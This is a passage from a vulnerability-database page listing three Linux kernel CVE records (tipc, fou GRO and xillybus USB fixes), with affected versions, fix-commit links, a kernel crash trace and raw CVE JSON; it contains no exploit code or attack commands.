	https://git.kernel.org/stable/c/253405541be2f15ff…
	https://git.kernel.org/stable/c/aa38bf74899de07cf…
	https://git.kernel.org/stable/c/5eea1276754505836…
	https://git.kernel.org/stable/c/728734352743a78b4…
	https://git.kernel.org/stable/c/76ddf84a52f0d8ec3…
	https://git.kernel.org/stable/c/2abe350db1aa599ee…
	https://git.kernel.org/stable/c/fa96c6baef1b5385e…

Impacted products

Vendor

Product

Version

Linux

Affected: d0f91938bede204a343473792529e0db7d599836 , < 7ec3335dd89c8d169e9650e4bac64fde71fdf15b (git)
Affected: d0f91938bede204a343473792529e0db7d599836 , < 253405541be2f15ffebdeac2f4cf4b7e9144d12f (git)
Affected: d0f91938bede204a343473792529e0db7d599836 , < aa38bf74899de07cf70b50cd17f8ad45fb6654c8 (git)
Affected: d0f91938bede204a343473792529e0db7d599836 , < 5eea127675450583680c8170358bcba43227bd69 (git)
Affected: d0f91938bede204a343473792529e0db7d599836 , < 728734352743a78b4c5a7285b282127696a4a813 (git)
Affected: d0f91938bede204a343473792529e0db7d599836 , < 76ddf84a52f0d8ec3f5db6ccce08faf202a17d28 (git)
Affected: d0f91938bede204a343473792529e0db7d599836 , < 2abe350db1aa599eeebc6892237d0bce0f1de62a (git)
Affected: d0f91938bede204a343473792529e0db7d599836 , < fa96c6baef1b5385e2f0c0677b32b3839e716076 (git)

Linux

Affected: 4.1
Unaffected: 0 , < 4.1 (semver)
Unaffected: 4.19.320 , ≤ 4.19.* (semver)
Unaffected: 5.4.282 , ≤ 5.4.* (semver)
Unaffected: 5.10.224 , ≤ 5.10.* (semver)
Unaffected: 5.15.165 , ≤ 5.15.* (semver)
Unaffected: 6.1.103 , ≤ 6.1.* (semver)
Unaffected: 6.6.44 , ≤ 6.6.* (semver)
Unaffected: 6.10.3 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42284",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:11:26.639456Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-12T17:33:30.616Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:03:29.114Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/tipc/udp_media.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "7ec3335dd89c8d169e9650e4bac64fde71fdf15b",
              "status": "affected",
              "version": "d0f91938bede204a343473792529e0db7d599836",
              "versionType": "git"
            },
            {
              "lessThan": "253405541be2f15ffebdeac2f4cf4b7e9144d12f",
              "status": "affected",
              "version": "d0f91938bede204a343473792529e0db7d599836",
              "versionType": "git"
            },
            {
              "lessThan": "aa38bf74899de07cf70b50cd17f8ad45fb6654c8",
              "status": "affected",
              "version": "d0f91938bede204a343473792529e0db7d599836",
              "versionType": "git"
            },
            {
              "lessThan": "5eea127675450583680c8170358bcba43227bd69",
              "status": "affected",
              "version": "d0f91938bede204a343473792529e0db7d599836",
              "versionType": "git"
            },
            {
              "lessThan": "728734352743a78b4c5a7285b282127696a4a813",
              "status": "affected",
              "version": "d0f91938bede204a343473792529e0db7d599836",
              "versionType": "git"
            },
            {
              "lessThan": "76ddf84a52f0d8ec3f5db6ccce08faf202a17d28",
              "status": "affected",
              "version": "d0f91938bede204a343473792529e0db7d599836",
              "versionType": "git"
            },
            {
              "lessThan": "2abe350db1aa599eeebc6892237d0bce0f1de62a",
              "status": "affected",
              "version": "d0f91938bede204a343473792529e0db7d599836",
              "versionType": "git"
            },
            {
              "lessThan": "fa96c6baef1b5385e2f0c0677b32b3839e716076",
              "status": "affected",
              "version": "d0f91938bede204a343473792529e0db7d599836",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/tipc/udp_media.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.1"
            },
            {
              "lessThan": "4.1",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.320",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.282",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.224",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.165",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.103",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.44",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.320",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.282",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.224",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.165",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.103",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.44",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.3",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntipc: Return non-zero value from tipc_udp_addr2str() on error\n\ntipc_udp_addr2str() should return non-zero value if the UDP media\naddress is invalid. Otherwise, a buffer overflow access can occur in\ntipc_media_addr_printf(). Fix this by returning 1 on an invalid UDP\nmedia address."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:25:55.793Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/7ec3335dd89c8d169e9650e4bac64fde71fdf15b"
        },
        {
          "url": "https://git.kernel.org/stable/c/253405541be2f15ffebdeac2f4cf4b7e9144d12f"
        },
        {
          "url": "https://git.kernel.org/stable/c/aa38bf74899de07cf70b50cd17f8ad45fb6654c8"
        },
        {
          "url": "https://git.kernel.org/stable/c/5eea127675450583680c8170358bcba43227bd69"
        },
        {
          "url": "https://git.kernel.org/stable/c/728734352743a78b4c5a7285b282127696a4a813"
        },
        {
          "url": "https://git.kernel.org/stable/c/76ddf84a52f0d8ec3f5db6ccce08faf202a17d28"
        },
        {
          "url": "https://git.kernel.org/stable/c/2abe350db1aa599eeebc6892237d0bce0f1de62a"
        },
        {
          "url": "https://git.kernel.org/stable/c/fa96c6baef1b5385e2f0c0677b32b3839e716076"
        }
      ],
      "title": "tipc: Return non-zero value from tipc_udp_addr2str() on error",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42284",
    "datePublished": "2024-08-17T09:08:50.576Z",
    "dateReserved": "2024-07-30T07:40:12.262Z",
    "dateUpdated": "2025-11-03T22:03:29.114Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-46763 (GCVE-0-2024-46763)

Vulnerability from cvelistv5 – Published: 2024-09-18 07:12 – Updated: 2025-11-03 22:18

Title

fou: Fix null-ptr-deref in GRO.

Summary

In the Linux kernel, the following vulnerability has been resolved: fou: Fix null-ptr-deref in GRO. We observed a null-ptr-deref in fou_gro_receive() while shutting down a host. [0] The NULL pointer is sk->sk_user_data, and the offset 8 is of protocol in struct fou. When fou_release() is called due to netns dismantle or explicit tunnel teardown, udp_tunnel_sock_release() sets NULL to sk->sk_user_data. Then, the tunnel socket is destroyed after a single RCU grace period. So, in-flight udp4_gro_receive() could find the socket and execute the FOU GRO handler, where sk->sk_user_data could be NULL. Let's use rcu_dereference_sk_user_data() in fou_from_sock() and add NULL checks in FOU GRO handlers. [0]: BUG: kernel NULL pointer dereference, address: 0000000000000008 PF: supervisor read access in kernel mode PF: error_code(0x0000) - not-present page PGD 80000001032f4067 P4D 80000001032f4067 PUD 103240067 PMD 0 SMP PTI CPU: 0 PID: 0 Comm: swapper/0 Not tainted 5.10.216-204.855.amzn2.x86_64 #1 Hardware name: Amazon EC2 c5.large/, BIOS 1.0 10/16/2017 RIP: 0010:fou_gro_receive (net/ipv4/fou.c:233) [fou] Code: 41 5f c3 cc cc cc cc e8 e7 2e 69 f4 0f 1f 80 00 00 00 00 0f 1f 44 00 00 49 89 f8 41 54 48 89 f7 48 89 d6 49 8b 80 88 02 00 00 <0f> b6 48 08 0f b7 42 4a 66 25 fd fd 80 cc 02 66 89 42 4a 0f b6 42 RSP: 0018:ffffa330c0003d08 EFLAGS: 00010297 RAX: 0000000000000000 RBX: ffff93d9e3a6b900 RCX: 0000000000000010 RDX: ffff93d9e3a6b900 RSI: ffff93d9e3a6b900 RDI: ffff93dac2e24d08 RBP: ffff93d9e3a6b900 R08: ffff93dacbce6400 R09: 0000000000000002 R10: 0000000000000000 R11: ffffffffb5f369b0 R12: ffff93dacbce6400 R13: ffff93dac2e24d08 R14: 0000000000000000 R15: ffffffffb4edd1c0 FS: 0000000000000000(0000) GS:ffff93daee800000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000008 CR3: 0000000102140001 CR4: 00000000007706f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 PKRU: 55555554 Call Trace: <IRQ> ? show_trace_log_lvl (arch/x86/kernel/dumpstack.c:259) ? __die_body.cold (arch/x86/kernel/dumpstack.c:478 arch/x86/kernel/dumpstack.c:420) ? no_context (arch/x86/mm/fault.c:752) ? exc_page_fault (arch/x86/include/asm/irqflags.h:49 arch/x86/include/asm/irqflags.h:89 arch/x86/mm/fault.c:1435 arch/x86/mm/fault.c:1483) ? asm_exc_page_fault (arch/x86/include/asm/idtentry.h:571) ? fou_gro_receive (net/ipv4/fou.c:233) [fou] udp_gro_receive (include/linux/netdevice.h:2552 net/ipv4/udp_offload.c:559) udp4_gro_receive (net/ipv4/udp_offload.c:604) inet_gro_receive (net/ipv4/af_inet.c:1549 (discriminator 7)) dev_gro_receive (net/core/dev.c:6035 (discriminator 4)) napi_gro_receive (net/core/dev.c:6170) ena_clean_rx_irq (drivers/amazon/net/ena/ena_netdev.c:1558) [ena] ena_io_poll (drivers/amazon/net/ena/ena_netdev.c:1742) [ena] napi_poll (net/core/dev.c:6847) net_rx_action (net/core/dev.c:6917) __do_softirq (arch/x86/include/asm/jump_label.h:25 include/linux/jump_label.h:200 include/trace/events/irq.h:142 kernel/softirq.c:299) asm_call_irq_on_stack (arch/x86/entry/entry_64.S:809) </IRQ> do_softirq_own_stack (arch/x86/include/asm/irq_stack.h:27 arch/x86/include/asm/irq_stack.h:77 arch/x86/kernel/irq_64.c:77) irq_exit_rcu (kernel/softirq.c:393 kernel/softirq.c:423 kernel/softirq.c:435) common_interrupt (arch/x86/kernel/irq.c:239) asm_common_interrupt (arch/x86/include/asm/idtentry.h:626) RIP: 0010:acpi_idle_do_entry (arch/x86/include/asm/irqflags.h:49 arch/x86/include/asm/irqflags.h:89 drivers/acpi/processor_idle.c:114 drivers/acpi/processor_idle.c:575) Code: 8b 15 d1 3c c4 02 ed c3 cc cc cc cc 65 48 8b 04 25 40 ef 01 00 48 8b 00 a8 08 75 eb 0f 1f 44 00 00 0f 00 2d d5 09 55 00 fb f4 <fa> c3 cc cc cc cc e9 be fc ff ff 66 66 2e 0f 1f 84 00 00 00 00 00 RSP: 0018:ffffffffb5603e58 EFLAGS: 00000246 RAX: 0000000000004000 RBX: ffff93dac0929c00 RCX: ffff93daee833900 RDX: ffff93daee800000 RSI: ffff93d ---truncated---

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/231c235d2f7a66f01…
	https://git.kernel.org/stable/c/4494bccb52ffda22c…
	https://git.kernel.org/stable/c/d7567f098f54cb53e…
	https://git.kernel.org/stable/c/1df42be305fe478de…
	https://git.kernel.org/stable/c/c46cd6aaca81040de…
	https://git.kernel.org/stable/c/7e4196935069947d8…

Impacted products

Vendor

Product

Version

Linux

Affected: d92283e338f6d6503b7417536bf3478f466cbc01 , < 231c235d2f7a66f018f172e26ffd47c363f244ef (git)
Affected: d92283e338f6d6503b7417536bf3478f466cbc01 , < 4494bccb52ffda22ce5a1163a776d970e6229e08 (git)
Affected: d92283e338f6d6503b7417536bf3478f466cbc01 , < d7567f098f54cb53ee3cee1c82e3d0ed9698b6b3 (git)
Affected: d92283e338f6d6503b7417536bf3478f466cbc01 , < 1df42be305fe478ded1ee0c1d775f4ece713483b (git)
Affected: d92283e338f6d6503b7417536bf3478f466cbc01 , < c46cd6aaca81040deaea3500ba75126963294bd9 (git)
Affected: d92283e338f6d6503b7417536bf3478f466cbc01 , < 7e4196935069947d8b70b09c1660b67b067e75cb (git)

Linux

Affected: 4.7
Unaffected: 0 , < 4.7 (semver)
Unaffected: 5.10.226 , ≤ 5.10.* (semver)
Unaffected: 5.15.167 , ≤ 5.15.* (semver)
Unaffected: 6.1.110 , ≤ 6.1.* (semver)
Unaffected: 6.6.51 , ≤ 6.6.* (semver)
Unaffected: 6.10.10 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-46763",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-29T14:43:18.405859Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-29T14:43:32.083Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:18:09.062Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/ipv4/fou_core.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "231c235d2f7a66f018f172e26ffd47c363f244ef",
              "status": "affected",
              "version": "d92283e338f6d6503b7417536bf3478f466cbc01",
              "versionType": "git"
            },
            {
              "lessThan": "4494bccb52ffda22ce5a1163a776d970e6229e08",
              "status": "affected",
              "version": "d92283e338f6d6503b7417536bf3478f466cbc01",
              "versionType": "git"
            },
            {
              "lessThan": "d7567f098f54cb53ee3cee1c82e3d0ed9698b6b3",
              "status": "affected",
              "version": "d92283e338f6d6503b7417536bf3478f466cbc01",
              "versionType": "git"
            },
            {
              "lessThan": "1df42be305fe478ded1ee0c1d775f4ece713483b",
              "status": "affected",
              "version": "d92283e338f6d6503b7417536bf3478f466cbc01",
              "versionType": "git"
            },
            {
              "lessThan": "c46cd6aaca81040deaea3500ba75126963294bd9",
              "status": "affected",
              "version": "d92283e338f6d6503b7417536bf3478f466cbc01",
              "versionType": "git"
            },
            {
              "lessThan": "7e4196935069947d8b70b09c1660b67b067e75cb",
              "status": "affected",
              "version": "d92283e338f6d6503b7417536bf3478f466cbc01",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/ipv4/fou_core.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.7"
            },
            {
              "lessThan": "4.7",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.226",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.167",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.110",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.51",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.226",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.167",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.110",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.51",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.10",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfou: Fix null-ptr-deref in GRO.\n\nWe observed a null-ptr-deref in fou_gro_receive() while shutting down\na host.  [0]\n\nThe NULL pointer is sk-\u003esk_user_data, and the offset 8 is of protocol\nin struct fou.\n\nWhen fou_release() is called due to netns dismantle or explicit tunnel\nteardown, udp_tunnel_sock_release() sets NULL to sk-\u003esk_user_data.\nThen, the tunnel socket is destroyed after a single RCU grace period.\n\nSo, in-flight udp4_gro_receive() could find the socket and execute the\nFOU GRO handler, where sk-\u003esk_user_data could be NULL.\n\nLet\u0027s use rcu_dereference_sk_user_data() in fou_from_sock() and add NULL\nchecks in FOU GRO handlers.\n\n[0]:\nBUG: kernel NULL pointer dereference, address: 0000000000000008\n PF: supervisor read access in kernel mode\n PF: error_code(0x0000) - not-present page\nPGD 80000001032f4067 P4D 80000001032f4067 PUD 103240067 PMD 0\nSMP PTI\nCPU: 0 PID: 0 Comm: swapper/0 Not tainted 5.10.216-204.855.amzn2.x86_64 #1\nHardware name: Amazon EC2 c5.large/, BIOS 1.0 10/16/2017\nRIP: 0010:fou_gro_receive (net/ipv4/fou.c:233) [fou]\nCode: 41 5f c3 cc cc cc cc e8 e7 2e 69 f4 0f 1f 80 00 00 00 00 0f 1f 44 00 00 49 89 f8 41 54 48 89 f7 48 89 d6 49 8b 80 88 02 00 00 \u003c0f\u003e b6 48 08 0f b7 42 4a 66 25 fd fd 80 cc 02 66 89 42 4a 0f b6 42\nRSP: 0018:ffffa330c0003d08 EFLAGS: 00010297\nRAX: 0000000000000000 RBX: ffff93d9e3a6b900 RCX: 0000000000000010\nRDX: ffff93d9e3a6b900 RSI: ffff93d9e3a6b900 RDI: ffff93dac2e24d08\nRBP: ffff93d9e3a6b900 R08: ffff93dacbce6400 R09: 0000000000000002\nR10: 0000000000000000 R11: ffffffffb5f369b0 R12: ffff93dacbce6400\nR13: ffff93dac2e24d08 R14: 0000000000000000 R15: ffffffffb4edd1c0\nFS:  0000000000000000(0000) GS:ffff93daee800000(0000) knlGS:0000000000000000\nCS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000008 CR3: 0000000102140001 CR4: 00000000007706f0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nPKRU: 55555554\nCall Trace:\n \u003cIRQ\u003e\n ? show_trace_log_lvl (arch/x86/kernel/dumpstack.c:259)\n ? __die_body.cold (arch/x86/kernel/dumpstack.c:478 arch/x86/kernel/dumpstack.c:420)\n ? no_context (arch/x86/mm/fault.c:752)\n ? exc_page_fault (arch/x86/include/asm/irqflags.h:49 arch/x86/include/asm/irqflags.h:89 arch/x86/mm/fault.c:1435 arch/x86/mm/fault.c:1483)\n ? asm_exc_page_fault (arch/x86/include/asm/idtentry.h:571)\n ? fou_gro_receive (net/ipv4/fou.c:233) [fou]\n udp_gro_receive (include/linux/netdevice.h:2552 net/ipv4/udp_offload.c:559)\n udp4_gro_receive (net/ipv4/udp_offload.c:604)\n inet_gro_receive (net/ipv4/af_inet.c:1549 (discriminator 7))\n dev_gro_receive (net/core/dev.c:6035 (discriminator 4))\n napi_gro_receive (net/core/dev.c:6170)\n ena_clean_rx_irq (drivers/amazon/net/ena/ena_netdev.c:1558) [ena]\n ena_io_poll (drivers/amazon/net/ena/ena_netdev.c:1742) [ena]\n napi_poll (net/core/dev.c:6847)\n net_rx_action (net/core/dev.c:6917)\n __do_softirq (arch/x86/include/asm/jump_label.h:25 include/linux/jump_label.h:200 include/trace/events/irq.h:142 kernel/softirq.c:299)\n asm_call_irq_on_stack (arch/x86/entry/entry_64.S:809)\n\u003c/IRQ\u003e\n do_softirq_own_stack (arch/x86/include/asm/irq_stack.h:27 arch/x86/include/asm/irq_stack.h:77 arch/x86/kernel/irq_64.c:77)\n irq_exit_rcu (kernel/softirq.c:393 kernel/softirq.c:423 kernel/softirq.c:435)\n common_interrupt (arch/x86/kernel/irq.c:239)\n asm_common_interrupt (arch/x86/include/asm/idtentry.h:626)\nRIP: 0010:acpi_idle_do_entry (arch/x86/include/asm/irqflags.h:49 arch/x86/include/asm/irqflags.h:89 drivers/acpi/processor_idle.c:114 drivers/acpi/processor_idle.c:575)\nCode: 8b 15 d1 3c c4 02 ed c3 cc cc cc cc 65 48 8b 04 25 40 ef 01 00 48 8b 00 a8 08 75 eb 0f 1f 44 00 00 0f 00 2d d5 09 55 00 fb f4 \u003cfa\u003e c3 cc cc cc cc e9 be fc ff ff 66 66 2e 0f 1f 84 00 00 00 00 00\nRSP: 0018:ffffffffb5603e58 EFLAGS: 00000246\nRAX: 0000000000004000 RBX: ffff93dac0929c00 RCX: ffff93daee833900\nRDX: ffff93daee800000 RSI: ffff93d\n---truncated---"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:33:36.920Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/231c235d2f7a66f018f172e26ffd47c363f244ef"
        },
        {
          "url": "https://git.kernel.org/stable/c/4494bccb52ffda22ce5a1163a776d970e6229e08"
        },
        {
          "url": "https://git.kernel.org/stable/c/d7567f098f54cb53ee3cee1c82e3d0ed9698b6b3"
        },
        {
          "url": "https://git.kernel.org/stable/c/1df42be305fe478ded1ee0c1d775f4ece713483b"
        },
        {
          "url": "https://git.kernel.org/stable/c/c46cd6aaca81040deaea3500ba75126963294bd9"
        },
        {
          "url": "https://git.kernel.org/stable/c/7e4196935069947d8b70b09c1660b67b067e75cb"
        }
      ],
      "title": "fou: Fix null-ptr-deref in GRO.",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-46763",
    "datePublished": "2024-09-18T07:12:22.666Z",
    "dateReserved": "2024-09-11T15:12:18.272Z",
    "dateUpdated": "2025-11-03T22:18:09.062Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-45011 (GCVE-0-2024-45011)

Vulnerability from cvelistv5 – Published: 2024-09-11 15:13 – Updated: 2025-11-03 22:15

Title

char: xillybus: Check USB endpoints when probing device

Summary

In the Linux kernel, the following vulnerability has been resolved: char: xillybus: Check USB endpoints when probing device Ensure, as the driver probes the device, that all endpoints that the driver may attempt to access exist and are of the correct type. All XillyUSB devices must have a Bulk IN and Bulk OUT endpoint at address 1. This is verified in xillyusb_setup_base_eps(). On top of that, a XillyUSB device may have additional Bulk OUT endpoints. The information about these endpoints' addresses is deduced from a data structure (the IDT) that the driver fetches from the device while probing it. These endpoints are checked in setup_channels(). A XillyUSB device never has more than one IN endpoint, as all data towards the host is multiplexed in this single Bulk IN endpoint. This is why setup_channels() only checks OUT endpoints.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/25ee8b2908200fc86…
	https://git.kernel.org/stable/c/4267131278f5cc98f…
	https://git.kernel.org/stable/c/5cff754692ad45d50…
	https://git.kernel.org/stable/c/1371d32b95972d39c…
	https://git.kernel.org/stable/c/2374bf7558de915ed…

Impacted products

Vendor

Product

Version

Linux

Affected: a53d1202aef122894b6e46116a92174a9123db5d , < 25ee8b2908200fc862c0434e5ad483817d50ceda (git)
Affected: a53d1202aef122894b6e46116a92174a9123db5d , < 4267131278f5cc98f8db31d035d64bdbbfe18658 (git)
Affected: a53d1202aef122894b6e46116a92174a9123db5d , < 5cff754692ad45d5086b75fef8cc3a99c30a1005 (git)
Affected: a53d1202aef122894b6e46116a92174a9123db5d , < 1371d32b95972d39c1e6e4bae8b6d0df1b573731 (git)
Affected: a53d1202aef122894b6e46116a92174a9123db5d , < 2374bf7558de915edc6ec8cb10ec3291dfab9594 (git)

Linux

Affected: 5.14
Unaffected: 0 , < 5.14 (semver)
Unaffected: 5.15.166 , ≤ 5.15.* (semver)
Unaffected: 6.1.107 , ≤ 6.1.* (semver)
Unaffected: 6.6.48 , ≤ 6.6.* (semver)
Unaffected: 6.10.7 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-45011",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-29T15:50:39.730810Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
